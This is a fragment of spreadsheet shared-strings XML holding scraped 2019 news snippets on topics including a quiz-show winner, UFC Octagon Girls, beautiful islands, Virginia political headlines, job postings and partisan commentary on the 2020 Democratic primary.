  </si>
  <si>
    <t>Jeremy Clarkson, 59, began Who Wants to Be a Millionaire tonight with Davyth Fear from Carmarthen. Davyth was hopeful to walk away with a cash prize, but didn’t expect he’d win the amount he managed to secure. The contestant faced a number of gripping general knowledge questions and as his time came to an end, he decided he would walk away with half a million pounds than try and pursue more. Viewers of the ITV quiz show quickly took to Twitter to comment on the win, praising the Welsh man for winning the jackpot of £500,000. One wrote: “Life changing amount of money all the same. Well done Davyth #whowantstobeamillionaire.” More to follow… Source link</t>
  </si>
  <si>
    <t>Members at the Camperdown Golf Course have welcomed the support of a professional who has backed their campaign to save the beloved course.</t>
  </si>
  <si>
    <t>Rhiannon Shine And Jessica Warriner</t>
  </si>
  <si>
    <t>Locals say bad driving — mainly from tourists — is to blame for a spate of fatal crashes on a stretch of Indian Ocean Drive north of Perth, after the latest serious accident claimed the lives of two women.</t>
  </si>
  <si>
    <t>Eyes Open To Life posted a photo: Big heavy clouds threaten to bring rain but</t>
  </si>
  <si>
    <t>Peter FitzSimons</t>
  </si>
  <si>
    <t>The numbers don't lie and why mess with a good thing - Tim Paine must stay as skipper leaving Steve Smith to focus on what he does best.</t>
  </si>
  <si>
    <t>Dana White Responds to Calls to Ban Octagon Girls Ahead of UFC 243, Says ‘It’s Ridiculous’ Original Source Speaking to The Daily Telegraph, UFC President Dana White responded to calls by UFC politicians to ban the longtime practice of ring card girls or Octagon Girls for their events. Politicians reportedly tried pressure UFC end the practice Octagon Girls before UFC 243, which is scheduled for October 6 in Melbourne, Australia. A spokesperson for Premier of Victoria, Daniel Andrews, reportedly stated, “The Grand Prix did the right thing in ending the use of grid girls and we encourage other events to make similar moves.” Lord Mayor of Melbourne Sally Capp also opposed the use of Octagon Girls, stating, “It’s 2019, do we really still need scantily clad women to wander around the middle of a fighting ring between rounds? Grid girls are no longer part of Formula One, walk-on girls are no longer part of professional darts – surely it’s time to move on.” Speaking on the matter, Dana White told the Telegraph, “Our Octagon Girls, they’re as much a part of the UFC brand as anyone, they’re ambassadors for our sport. So for someone who has absolutely no education whatsoever about who these girls are – about what they do, what they mean to the UFC – to start going off, it’s ridiculous.” White added that women are not treated better than anywhere else in the UFC. He added, “So you can look at any sport you like, nobody treats women better than we do. And I’d suggest these people calling on them to be banned go have a look at what these girls do with the company, the type of money they’re making.” White continued, “Do that and you’ll realize these girls are as important to our brand as anyone else in the company. And that’s exactly the way we treat them.” UFC 243 is scheduled for Saturday, October 5. The event will be held at the 56,000-seat Marvel Stadium in Melbourne, Australia. The event will be headlined by a middleweight title unification bout with middleweight champion Robert Whittaker facing interim champion Israel Adesanya. (function(d, s, id) var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = “http://connect.facebook.net/en_US/all.js#xfbml=1”; fjs.parentNode.insertBefore(js, fjs); (document, ‘script’, ‘facebook-jssdk’));(function(d, s, id) var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = “http://connect.facebook.net/en_US/all.js#xfbml=1”; fjs.parentNode.insertBefore(js, fjs); (document, ‘script’, ‘facebook-jssdk’));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Dana White Responds to Calls to Ban Octagon Girls Ahead of UFC 243, Says ‘It’s Ridiculous’ appeared first on Sky-News. Source link</t>
  </si>
  <si>
    <t>Sahar Khodayari set herself on fire after learning that she could face six months in prison for sneaking into a men-only soccer match.</t>
  </si>
  <si>
    <t>Erin Pearson</t>
  </si>
  <si>
    <t>A man threw a hunting knife at police after he was shot during an arrest on the Victoria-NSW border.</t>
  </si>
  <si>
    <t>Spanish Romanian Dictionary – travel dictionary to translate Spanish to Romanian. Click on the list to show Spanish or Romanian synonyms to understand the broader use of the words. The learning games help to build vocabulary. View the history of words used in the game again clickable for synonyms. Ideal for travelers, business people or … Continue reading Spanish Romanian Dictionary →</t>
  </si>
  <si>
    <t>During the first half of 2019, cybercriminals increased the intensity of both IoT and SMB-related attacks according to a new report from F-Secure. The firm's “Attack Landscape H1 2019” report highlighted the threat unsecured IoT devices can pose to businesses and consumers as well as the continued popularity of Eternal Blue and similar exploits two years after the WannaCry ransomware was released on the world. F-Secure uses decoy servers called honeypots to lure in attackers to collect information on their activities and this year its honeypots measured a twelvefold increase in IoT and SMB-related attacks compared to the same period a year ago. This increase… TechRadar – All the latest technology news The post IoT devices still major target for cyberattacks appeared first on Crosat - News from the entertainment and multimedia.</t>
  </si>
  <si>
    <t>By Stephany Nunneley, Tuesday, September 17, 2019 at 17:14 GMT Those considering buying tickets for X019 can do so starting October 1st. Originally scheduled to go on sale September 24 X019 tickets will be available on October 1st. This year, Microsoft is donating all funds from ticket sales in the UK to the charity SpecialEffect. The charity creates and lends custom control configurations to help players with a physical disability. SpecialEffect has just played a role in creating the Xbox Adaptive Controller. It allows users to connect switches and devices that they already own, providing them with additional customization and accessibility options. The association has also developed a software called EyeMine to allow people to play Minecraft only with their eyes. You can see it yourself in the video below. Tickets to attend the Xbox show will earn you £ 19.99 and can be purchased on the official website of the X019 event. The X019, which took place last year in Mexico, will take place from 14 to 16 November at the Copperbox Arena in London. Sometimes we include links to online stores. If you click on one and make a purchase, we could receive a small commission. For more information, go here.</t>
  </si>
  <si>
    <t>Job Description We are a small local family-owned and operated residential lawn care company based out of the Etobicoke area. Working at Markland Wood Group is different from any other lawn care job. We offer more than just seasonal employment. When you join our team, you instantly become a huge part of Etobicoke’s premier lawn .. Read more</t>
  </si>
  <si>
    <t>(CNN) — Spin the globe, pick a spot and odds are good you’ll alight on the color blue: 71% of the Earth’s surface is covered with water. Vast stretches of ocean spread from the edges of the continents, and what lies between the coasts is true wilderness. Far from terrestrial plants and light-filled shallows, the open ocean makes no accommodation for human comfort or survival. Islands are the exception. These widely scattered landing places offer respite in the form of fresh water, abundant food and the occasional fruity cocktail. Maybe that’s the travel secret behind the evocative power of beautiful islands. Like the rainforest-cloaked island of Kaua’i, some are the summits of drowned volcanoes, smoking and burning above the waterline. Others, such as the Seychelles, are the scattered shards of continents, while atolls are coral crusted over a sinking landmass. Every single one invites travelers to leave familiar shores behind. Whether you’re dreaming of a beachy escape or plotting a course for the edges of the Earth, these are the world’s 10 most beautiful islands: Milos (Greece) This is where the famous Venus de Milo statue was discovered in 1820. Shutterstock Pale rock meets sapphire water on Milos, a tiny island at the southwestern tip of the Greek Cyclades. This is where the famed Venus de Milo was discovered in 1820, and the island — like the statue — does spectacular justice to the ancient goddess of love. Whitewashed houses with blue shutters mirror the island’s natural color scheme, and the coast has eroded into a wonderland of arches, coves and white-sand beaches that invite discovery. The Kleftiko caves, which you can reach only by water, are amazing. Go to: Sip chilled ouzo at a beach-side restaurant, and try grilled seafood that’s fresh from the Aegean. Milos can be reached by a 40-minute flight or a ferry from Athens (ferries take between three and seven hours). Bartolomé (Ecuador) Visitors can’t stay overnight at Bartolome Island in the Galapagos. Shutterstock A wilderness preserve that’s among the Galápagos’ most beautiful islands, Bartolomé is a jewel-toned setting for charismatic penguins, skittering crabs and marine iguanas. The bald summit of Pinnacle Rock looks out across pale beaches and blue-green water, their colors offset by the coal-black lava flow at Sullivan Bay. It’s not possible to overnight on Bartolomé, which is named for a friend of the naturalist Charles Darwin, but the island is just a day trip away from Santa Cruz, the Galápagos’ main base for visitors. Go to: Don a snorkel and swim with Galápagos penguins, the only penguins to live north of the equator. Spot the native birds as they dart below the surface while looking for food. Fregate (Seychelles) Lapped by the Indian Ocean in a dozen hues, Fregate is a taste of the Seychelles at their dreamiest. Wild landscapes still thrive on the private island, which is a haven from the Seychelles’ more developed shores. Giant aldabra tortoises saunter through the understory here, while two species of sea turtles crawl ashore to lay their eggs. Granite cliffs swerve for the breakers, giving way to powdery beaches: one, Anse Macquereau, can be turned into a perfectly private getaway. A “beach occupied” sign dangles from a nearby palm tree, inviting visitors to reserve the picture-perfect cove for themselves. Go to: Channel castaway fantasies gone luxe. (Eating breakfast in a banyan tree platform is where Swiss Family Robinson meets fine china, pressed linen and impeccable service.) St. Lucia (Lesser Antilles) The Pitons are twin volcanic spires located in Saint Lucia. Daniel Slim/AFP/Getty Images Bright-painted houses are strewn like confetti across St. Lucia’s steeply pitched slopes, which veer from rocky summits to the Caribbean shoreline. A matched set of volcanic peaks, the Pitons, are the spectacular centerpiece of this beautiful island. Lush forest at the base of the mountains, which are part of a UNESCO World Heritage Site, give way to miniaturized “elfin woodlands” at higher elevations. Here, look for fairy-sized hummingbirds, delicate ferns and trails shrouded in mist. Go to: Hike to the summit of Gros Piton, then enjoy post-trail rum drinks at nearby Sugar Beach — or from a private infinity pool with views of the mountains. Jura (Scotland) The Jura mountains dominate the view on the isle of the same name. Shutterstock Scotland’s wild and wind-scoured Inner Hebrides splinter into a maze of rocky isles. And with bare summits and clear-flowing streams, Jura is among the most beautiful islands in the archipelago. Walking trails ramble through mountains home to native red deer, while golden eagles and sea eagles wheel overhead. It’s a magnificent landscape that’s drawn generations of adventurers and escapists. For lovers of Scotch whisky, however, the famed Isle of Jura distillery is a pilgrimage place for heavily peated single-malt made in towering copper pot stills. Go to: Bundle up for a windy hike through the hills, followed by a glass of locally made single malt whisky at the Jura Hotel’s lively pub. Komodo Island (Indonesia) Komodo Island will close to visitors in 2020 to protect its most famous residents. Shutterstock From a lipstick-pink beach to free-roaming lizards, Komodo Island is a topsy-turvy tropical paradise pulled straight from a fever dream. Here, thorny savanna rolls towards a shoreline lapped by crystalline water, dramatically varied ecosystems that provide shelter for oddball wildlife. The island’s most famous residents are Komodo dragons, slow-moving creatures with sharp teeth and deadly venom. Coral reefs are a spectacular habitat for pygmy seahorses and the surreal-looking blue-ringed octopus, and lucky divers might spot Omura’s whales or rare dugongs, marine mammals that spend their days grazing on sea grass. Senja Island (Norway) Explore the Arctic Circle way of life in Senja Island. Shutterstock High mountains swoop toward indigo water off Senja Island, a showstopping destination in a country with more than 50,000 beautiful islands. Round-the-clock sunshine washes the lush slopes in summer, and winter brings a flickering display of northern lights. In the island’s historic fishing villages, bright-painted wooden buildings cluster between slopes and shore. From the rocky summits of Ånderdalen National Park to deep, ice-chilled fjords, Senja Island is a dramatic stage for the natural beauty of the Arctic. Go to: Spot free roaming reindeer, ride Viking horses above the Arctic Circle and watch the Northern Lights come out to play. Mo’orea (French Polynesia) A fringing reef wraps the island of Mo’orea in a sheltered embrace, creating a creamy blue lagoon that’s a natural playground for swimming and snorkeling. But it’s a dramatic backdrop of jungle mountains that make Mo’orea one of the most beautiful islands on Earth. The summits rise from the forest like jagged stone teeth, a rugged contrast to the paradise scenes at the water’s edge. And while Mo’orea is just a quick ferry trip away from the famously beautiful island of Tahiti, the smaller isle is far less developed. That means fewer crowds to contend with as you roam white-sand beaches, paddle clear bays and swim with humpback whales. Go to: Sleep in an overwater bungalow with views of the mountains, then sip your morning coffee as tropical fish dart beneath your front porch. Palawan, Philippines Palawan offers many secert beaches with clear water and pale sand. Shutterstock Go to: Ride a tidal river deep into a limestone cave system, then bask away the afternoon on a postcard-ready beach. Kaua’i (United States) All that lava rock from Kilauea’s smoking crater crumbles into otherworldly black-sand beaches,. Shutterstock An active volcano keeps things spicy on Kaua’i, but Kilauea’s smoking crater, lava flows and lunar landscapes are just the start of the island’s searing-hot beauty. All that lava rock crumbles into otherworldly black-sand beaches, while native forest provides habitat for bird species that only live in the Hawaiian islands. Venture into the wilderness here to find hanging valleys and towering waterfalls above crystal-clear freshwater pools. The most spectacular wilderness on Hawaii’s “Garden Island” flanks the Nā Pali Coast, which intrepid hikers can reach via a challenging trail known as one of America’s toughest walks. Go to: Hike the wilderness Nā Pali Coast Trail to an untouched beach that can’t be reached by road. When you use affiliate links on this page, CNN may receive revenue. CNN is not responsible for the goods or services provided through such links. 10 of the world's most beautiful islands The post 10 of the world's most beautiful islands appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>MEGHAN MARKLE, 38, and Kate Middleton, 37, are both style icons in their own right. How does their style compare and what will Meghan wear in Africa? Daily Express :: Life and Style Feed</t>
  </si>
  <si>
    <t>THERE is a new kid in town with soon-to-be-open South Townsville craft microbrewery, Tiny Mountain announcing their official head brewer.</t>
  </si>
  <si>
    <t>Nasik Tourism | Famous 8 Places to Visit in Nasik Tour The post Nasik Tourism | Famous 8 Places to Visit in Nasik Tour appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>by Lowell Here are a few national and Virginia news headlines, political and otherwise, for Friday, September 20. Protesters Rally Around the World for Action on Climate Change (“Rallies start in Australia, with more set for U.S. and Europe; Google makes biggest clean energy purchase ever by a company”) The climate crisis explained in 10 charts (“From the rise and rise of carbon dioxide in the atmosphere to possible solutions”) Climate emergency poses major threat to future global health, say top medics ‘Do your jobs’: Striking students demand leaders act on climate From Sydney To San Francisco, Millions To Strike For Global Climate Action (“The day of protest precedes the United Nations summit on how to rein in the worst effects of climate change.”) With Israel’s Election Results, Netanyahu Is Reminded That Trump Hates Losers Israel’s Election Results Prove the Center Has Won and Ideology Is Dead The escalating crisis with Iran is Trump’s self-inflicted wound Few Americans Want U.S. Forces To Defend Saudi Arabia The End of Saudi Arabia’s Illusion (“Time to face reality: The United States doesn’t want to go to war with Iran to protect its Arab allies.”) ‘This thing is a wildfire’: Racist makeup pictures rock Trudeau campaign Can Justin Trudeau survive the blackface scandal? Canadian political experts weigh in New revelations deepen scandal over Trump whistleblower complaint Trump Whistleblower Saga Threatens to Blow Up 2020 Campaign (“Two reports on Thursday night say the conversation in the complaint involved Ukraine, the country that the president’s close lawyer has turned to looking for dirt on Joe Biden.”) As the whistleblower story gets worse for Trump, his corruption keeps spreading Whistleblower complaint about Trump involves Ukraine, say people familiar with the matter Trump’s purported ‘promise’ to foreign leader came after White House scaled back readouts What Recourse Does the Republic Have in a Situation Like This? (“The Trump administration* tells Congress to pound sand on the matter of the president*’s ‘promise’ to a foreign leader.”) Donald Trump’s ‘Promise’ to a Foreign Leader Is More Than Just Troubling We’re losing birds at an alarming rate. We can do something about it. (“In the past 50 years, North America has lost 3 billion birds.Luckily, we know how to reverse the decline.” We need to conserve a lot more land. Also, “It’s time to ban neonics until we can be sure that these poisons are not permanently damaging American nature.” And, of course, keep cats INDOORS and “[add] decals or other bird deterrents to glass windows”) The Quiet Disappearance of Birds in North America ‘Of course I did’: Giuliani acknowledges asking Ukraine to investigate Biden Rudy Giuliani denies asking Ukraine to investigate Biden — before admitting it Watch Rudy Giuliani melt down on CNN after being asked about whistleblower complaint against Trump Fox News barely covers whistleblower complaint about Trump’s reported promise to a foreign leader For border wall, officials consider diverting billions more in military funds (“Internal projections show that the president’s goal of completing nearly 500 miles of new barriers by the 2020 election will require $18.4 billion, far more than the administration has publicly disclosed.” That’s completely insane.) “It Won’t End Well”: Trump and His Obscure New National-Security Chief California’s Fighting for Clean Air. Who’s Trump Fighting For? (“The White House’s latest attack on the environment hurts everybody — including the automakers it’s supposed to help.” Trump is a sadist and a nihilist who LIKES hurting everybody.) Trump is the smear artist — not the New York Times Did Brett Kavanaugh ask New York Times reporters to lie in their book? Yeah, pretty much. Attorney General Barr once lauded ‘masterful’ book that criticizes campus sexual assault investigations Carson spoke dismissively of transgender people at meeting, according to staff (Anyone surprised?) Trump Lawyers Argue He Cannot Be Criminally Investigated (Banana Republic stuff.) The Senate surrenders legislating on guns to Trump (How hard would it be to say in the headline, “Senate REPUBLICANS surrender legislating on guns to Trump?”) Calling out the GOP’s hypocrisy and corruption (“The next president must bring about a complete change of culture. Trump-style corruption is representative of a failed dictatorship, not a great democracy.”) Federal judge blocks California law to force disclosure of Trump’s tax returns How to Make Tech Companies Actually Fight Climate Change (“Do more of what Amazon workers are doing”) House Democrats held the first hearing on DC statehood in 25 years (“Republicans are unified in their opposition.” As usual, Republicans want to deny people their rights.) Trump Declares War on California (“It’s a liberal state, so it must be punished.”) Amazon makes largest order of electric vehicles as part of 2040 zero carbon pledge (“In a video of the announcement that was posted by the e-commerce company on its Twitter news channel, Bezos says that he wants Amazon to undertake a number of measures that would see the company reach the Paris agreement target of zero net carbon by the second half of the century a full ten years early.”) Buttigieg calls Warren ‘extremely evasive’ on health taxes Black Leaders Condemn Attacks by Sanders Supporters Amid Fallout From WFP’s Warren Endorsement Elizabeth Warren Keeps Climbing Buttigieg, Harris head to Iowa, seeking to rise into 2020 Democratic top tier Sanders retools campaign as Warren gains steam (“A sense of urgency has fallen over Sanders’s supporters, who worry that the liberal energy in the race has shifted behind Warren.”) Poll shows most Americans back Beto’s plan to buy back assault weapons (And that’s RASMUSSEN, which is basically Republican propaganda.) Roy Cohn Is How We Got Trump (“From McCarthyism to the mob to Trump, Cohn enabled evil. Why did elites embrace him?”) How the Koch Network’s ‘Social Change’ Strategy Is Built to Kill the Electric Car (Just a reminder that the Koch brothers are evil.) Warning signs flash for Tillis in North Carolina Sen. Mark Warner: I’m quite harsh with my criticism of Facebook (And for good reason.) WATCH: Rep. Luria highlights importance of fighting climate change House passes Congresswoman Wexton’s bill protecting furloughed employees Spanberger calls climate change a national security priority BREAKING: Just 48 Hours After Gov. Northam’s Executive Order on 100% Carbon-Free Power, Dominion Proposes “Largest Offshore Wind Development in the Country” Dominion wants to build the nation’s largest offshore wind farm near Virginia Beach The Mystery Mega-Donor Behind Freitas’ $500K Campaign Donation (“He could support candidates who are conservative that could probably win if they weren’t the fringe right, homophobic bomb-throwers that these people had convinced him early on to support.”) Justin Fairfax lawsuit aims to settle scores, but it could open new chapter in Virginia politics (No mention of the serious substance here, only the political “game”) Political Control in Virginia Up for Grabs in Tight Election (“Democrats seek to flip both houses of legislature, reviving gun-control efforts made after a May mass shooting”) Editorial: Richmond deserves greater accountability FWIW Virginia: The Climate Crisis; Also, Spotlight on SD 12 – Debra Rodman (D) v. Sen. Siobhan Dunnavant (R) Video: In HD28 Debate, Almost Everything Right-Wing Republican Candidate Says Is Demonstrably False and/or Ridiculous (Milde really, really doesn’t think we should raise the minimum wage or get all “emotional” about the ERA, gun violence prevention) Care in Action Makes Historic Six-Figure Investment in Virginia Elections to Mobilize Domestic Workers Climate Activists Plan Arts Centric “Circle of Protection: Bent Mountain” Sen. Glen Sturtevant’s Misleading New Ad on Healthcare Ignores His Record of Putting Partisanship Over People’s Lives EDITORIAL: No racial categories on marriage licenses Amid a surge of slots, bingo’s last gasps in Virginia Northam announces $8.5M firm expansion, 105 new jobs Too Late for Republican Nomination, Now “Independent” Fahey Instead Earns Republican Endorsement Norfolk sheriff ends controversial immigration detention program Stoney seeks to lease to a developer a Shockoe Bottom parking lot that could sit atop slavery site Virginia’s Democratic Party Joins Ranks of “No Dominion Money” Legislators and Candidates State’s first lady wades into the water for first-hand look at Hampton students’ environmental program Remote health clinic returns to Lee as hospital prepares to reopen Monument Fund to be granted access to Jackson statue following vandalism Henrico chief says police had to shoot woman wielding ax, drawing harsh criticism from her brother One last spectacular September day before some heat returns this weekend (“Rain-free conditions continue until at least Monday, as our region gets thirsty.” We need rain, badly. And yes, this drought is very consistent with a climate-changed world.)</t>
  </si>
  <si>
    <t>Having dressed many fashion icons from Freddie Mercury to Princess Diana, the British designer though the whole world had forgotten her by the Nineties.</t>
  </si>
  <si>
    <t>BORIS JOHNSON received a boost from a cabinet minister who gave a rallying cry to Conservatives to stand behind the Prime Minister to help him deliver Brexit. Daily Express :: News Feed</t>
  </si>
  <si>
    <t>The best photos from the international wire agencies as chosen by our picture editors</t>
  </si>
  <si>
    <t>Nothing is a more boring topic of conversation than how much or little a person is eating or exercising.</t>
  </si>
  <si>
    <t>Oppo</t>
  </si>
  <si>
    <t>Straight Line of the Day: ‘Historic’ early snowstorm may bring blizzard conditions to Montana, several feet of snow to mountains. And…. 0 0</t>
  </si>
  <si>
    <t>Source: https://www.theverge.com/2019/9/13/20863934/portable-ssd-thunderbolt-usb-c-dont-care LaCie’s fast portable SSD makes USB-C less confusing The Rugged SSD Pro carries an IP67 rating. | Image: LaCie LaCie has a new portable SSD drive that should remove some of the confusion around USB-C connectivity. It’s called the LaCie Rugged SSD Pro and promises compatibility with modern computers featuring Thunderbolt 3 ports with USB-C connectors, and those with non-Thunderbolt 3 USB-C ports. The ports look the same, but they don’t act the same. The Rugged SSD Pro removes all the guesswork. And because it has “Pro” right in the name you just know that this portable SSD’s gotta be good. LaCie’s new drive is built around a Seagate FireCuda NVMe SSD with a claimed transfer speed up to 2800 MB/s when connected over Thunderbolt 3. Unfortunately, the company doesn’t list a transfer speed when connecting the drive over plain ol’ USB. It did however… Continue reading… Source: https://www.theverge.com/2019/9/13/20863934/portable-ssd-thunderbolt-usb-c-dont-care The post LaCie’s fast portable SSD makes USB-C less confusing appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>Nissan Motor Co Chief Executive Hiroto Saikawa has told some executives he plans to resign, the Nikkei newspaper reported on Sunday, in what would mark the latest upheaval over governance at the troubled Japanese automaker.</t>
  </si>
  <si>
    <t>Adam Pengilly</t>
  </si>
  <si>
    <t>The Rabbitohs had an interested onlooker at training before the biggest match of their season as their super coach went into bat for his leader.</t>
  </si>
  <si>
    <t>Paul Farrell</t>
  </si>
  <si>
    <t>Australia's security agencies were concerned that state and territory electoral commissions may also have been targeted as part of a cyber attack on federal political parties, according to previously confidential documents.</t>
  </si>
  <si>
    <t>The opening match of Pool D at the Rugby World Cup sees Australia take on Fiji at the Sapporo Dome. Daily Express :: Sport Feed</t>
  </si>
  <si>
    <t>[High Praise! to Turning Point USA] 3 0</t>
  </si>
  <si>
    <t>The 74-year-old is happier than ever with his other half, actress Catherine Zeta-Jones. See full article at Film-news.co.uk » The post Michael Douglas: 'Courtesy is key to a successful marriage' appeared first on www.cinemagotrailers.co.uk.</t>
  </si>
  <si>
    <t>One of Facebook's third-party fact-checkers has accused Britain's governing Conservative Party of misrepresenting a BBC News article in its ads on the social media platform.</t>
  </si>
  <si>
    <t>Historic reforms propelled China from poor and isolated, to one of the world's economic superpowers. The post How China became the world’s ‘economic miracle’ appeared first on Education - Career - Word Games - Distance learning.</t>
  </si>
  <si>
    <t>The members of staff were treated in A&amp;E for respiratory issues. The post Addenbrooke’s Hospital: Six treated after lab substance spillage appeared first on Education - Career - Word Games - Distance learning.</t>
  </si>
  <si>
    <t>IN DEMAND Recruitment and Consulting Inc.</t>
  </si>
  <si>
    <t>IN DEMAND Recruitment &amp; Consulting Inc. is currently looking to hire a SALES / ACCOUNT REPRESENTATIVE (AGRICULTURE BACKGROUND) for our Leduc, AB client. Our client connects agricultural producers to food, feed and industrial customers through a seamless supply chain. We help our customers compete in the global market and efficiently deliver products from origins to destinations through our marketing, sourcing, originating, storing, trading, consulting and processing of grain, oilseeds and crop inputs products and solutions. Our client’s business reaches across Canada, United States &amp; Mexico with an expansive asset footprint including over 200 grain elevators, export/import facilities, oilseed crush plants, biodiesel facilities, and farm service centers. The Sales Representatives (a collective term for Grain, Crop Input and Account Representatives) are accountable for generating top line revenue by helping customers succeed. As an integral member of the Farm Service Group (FSG) in the role of Account Representative you will be provided with the tools and training to help customers make informed decisions using our client’s full portfolio of products and services. While considering the farm customers’ preferences for conducting business and their individual goals, you will sell fertilizer, seed and crop protection products and help customers market their grain and manage risk. In providing solutions to the customers you will help them to succeed while growing the top line revenues for our client. JOB DESCRIPTION: Principal Accountabilities: Achieve top line revenue targets and help customers succeed by: Building productive, long-term relationships with farmer customers Developing a comprehensive understanding of the customers’ business Planning sales contacts that present solutions and value to customers Partnering with Grain Marketing and Agronomy Advisors to identify customers and sell consulting services Managing customer credit and accounts receivables to help customers make good financial decisions Execute our client’s customer focus fundamentals and best practices including: Optimizing strategic sales planning and time allocation through customer segmentation Meeting financial targets through strong individual customer tactical plans Creating and delivering on a well-defined weekly customer call plan to achieve financial targets Participating in weekly customer focus meetings to share plans for delivering value to customers Capture information accurately in the Customer Relationship Management tool (Salesforce.com) Continuously increase your knowledge of Agriculture, Agronomy, Grain Marketing and our client’s products and services Along with your FSG team, you will carry out specific administrative or operational goals to provide superior customer service. QUALIFICATIONS: Related post-secondary education in Business or Agriculture or equivalent work experience. Excellent interpersonal, communication and leadership skills Strong problem solving and decision-making skills Persistence and highly developed selling skills Ability to identify opportunities and prospects, build customer relationships and close sales Strong organizational time management and planning skills Demonstrated proficiency in math, written communications, and computer skills Strong planning skills, including the ability to segment markets, target and analyze customer potential Possess a Canadian Driver’s License Must be legally entitled to work for in Canada Preferred, but will provide training for the right candidate: Understand the Canadian agricultural system including grain marketing, grain transportation and crop production practices Knowledge of grain and / or crop input products Knowledge of grain and crop input operations and products Knowledge of grain marketing and agronomic practices Experience using customer relationship management software Qualified and interested applicants are encouraged to apply today in confidence by sending your resume as a MS Document to info@indemand.ca. ONLY QUALIFIED CANDIDATES WILL BE CONTACTED</t>
  </si>
  <si>
    <t>Both Duchesses have been photographed in these high street wedges more times than we can count - and here’s where to get them for yourself.</t>
  </si>
  <si>
    <t>The latest Emerson College poll for the 2020 California Democratic primary, conducted between Sept. 13 and Sept. 16, shows former Vice President Joe Biden and Vermont socialist Senator Bernie Sanders tied at 26%. Senator Elizabeth Warren is next at 20%. Andrew Yang has leapt past Senator Kamala Harris, picking up 7% support. Kamala Harris is now at 6%, with Beto O’Rourke at 5% and Peter Buttigieg at 4%. Only 3 Really Have a Chance The 2020 Democratic primary challenges are months away, which is an eternity in political time, but these results pretty much confirm that the Democratic race is down to three candidates. Harris is in big trouble in the 2020 Democratic primary. She is California’s senator as well as a former attorney general. That she can’t muster more than 7% of the vote in her home state suggests that the Democratic party doesn’t find her of much interest. That leaves Biden, Sanders, and Warren as the Democratic party’s leading contenders. Which of these three candidates has the best chance of winning the primary, and which has the best chance against President Donald Trump? Joe Biden: The Comfortable Old Shoe Joe Biden has a few things going for him in the 2020 Democratic primary. He’s like a comfortable old shoe, albeit one that has a few holes in it. He’s a known entity. He has 40% support from voters over age 50, according to the Emerson poll. While he could hardly be called a centrist, he is certainly more moderate than either Warren or Sanders. That might actually prove to be a critical element in the election. If Democratic voters have any sense, they will put up the candidate who actually has the best chance to win. That’s probably Joe Biden because Warren and Sanders are so far left. For lukewarm Trump supporters, such as suburban mothers, they may be more enticed to vote for the most moderate Democratic candidate that can be proffered. Joe Biden is probably best known for his repeated gaffes as opposed to any great policy he has instituted during his lifetime in politics. Of the three candidates, his most appealing factor is that he is the least offensive and least radical. That may be enough to win him the nomination. Most of the polls show Trump behind every one of the Democrat candidates, but that is typical at this stage of the election cycle. Trump would slaughter Biden in a debate but would have to be careful not to appear too aggressive or unhinged, lest that make Biden look more stable. Thus, Biden probably has the best chance to win both the nomination and the election. Bernie Sanders: The Grumpy Old Troll Bernie Sanders might’ve had the best shot at winning in 2016. The Democratic primary process effectively robbed him of that opportunity. It feels as though his time has passed as we approach the 2020 Democratic primary. He is popular with younger voters, picking up 34% of their support, according to the Emerson poll. Sanders is also supported by California’s Hispanic population, drawing 36% from that demographic. Emerson’s poll also noted that 67% of Sanders supporters would be most likely to stick with him, the most of any candidate. Sanders is appealing to many Democrats for the simple reason that his messaging has always been consistent. He is a socialist. He makes no apologies for it. He certainly seems to believe the things that he says. That may play well with people, but those policies are disastrous for America. Otherwise, the only reason that Sanders is still in this race and is popular with younger people is because of the ongoing indoctrination of younger people by the left. Younger people seem to have no clue about the historical dangers of socialism. Academic institutions across the country are loaded with leftist professors, feeding young minds with Marxist garbage. The simple truth is that a lot of younger voters don’t seem to know any better. They don’t know what they don’t know, so consequently, they vote for Sanders. He may also carry the sympathy of a number of voters who felt he got cheated in the last election primary cycle. Sanders would have more of a struggle against Trump than Biden would. Trump will easily be able to paint Sanders as an out of touch grumpy old troll but will really be able to hammer him on the socialism angle. Trump has always been very pro-capitalism and pro-America in his messaging. This kind of messaging appeals to a lot of independents, who are more concerned about having a job and keeping their family safe. Because Sanders is an unabashed socialist, Trump could easily use this to point out all of the negative policies that Sanders would institute as a socialist president. Elizabeth Warren: The Fauxcahontas Effect Elizabeth Warren is not out of the race, and she has a lot of strong support from important demographics, including women for the 2020 Democratic primary race. Warren is certainly the least qualified amongst the three, having spent very little time in the federal government and never having had executive experience. She cut her teeth as the so-called architect of the Consumer Financial Protection Bureau. Her message is also radical, constantly finger-wagging at the rich and pressing an agenda that is effectively socialist. In that regard, it feels like she is just riding Sanders’ coattails. She is also tied to Alexandria Ocasio-Cortez and the rest of “the squad.” As their fortunes go, it seems likely hers will as well. But back to that lack of experience…. One can argue that Obama was elected after barely serving in the Senate and not having any executive experience. Yet he was also facing a weak opposing candidate and the election was also a referendum on the ongoing Iraq war. That’s not the case this time around. Trump is a formidable foe, and wars are not on the public’s radar. Warren has not had to face the kind of withering verbal and Twitter assaults that Trump directs at these opponents. From an optics standpoint, she will appear tiny and weak compared to Trump’s larger-than-life stature. This is going to provide Trump with all kinds of ammunition. It is also a very compelling argument for Trump to say, “Who do you want sitting across from Vladimir Putin? Me or Fauxcahontas?” That image is a killer. Regardless, we are still a long way off from both the primary and the election. Anything can happen. Last modified (UTC): September 21, 2019 2:09 PM September 21, 2019 4:00 PM</t>
  </si>
  <si>
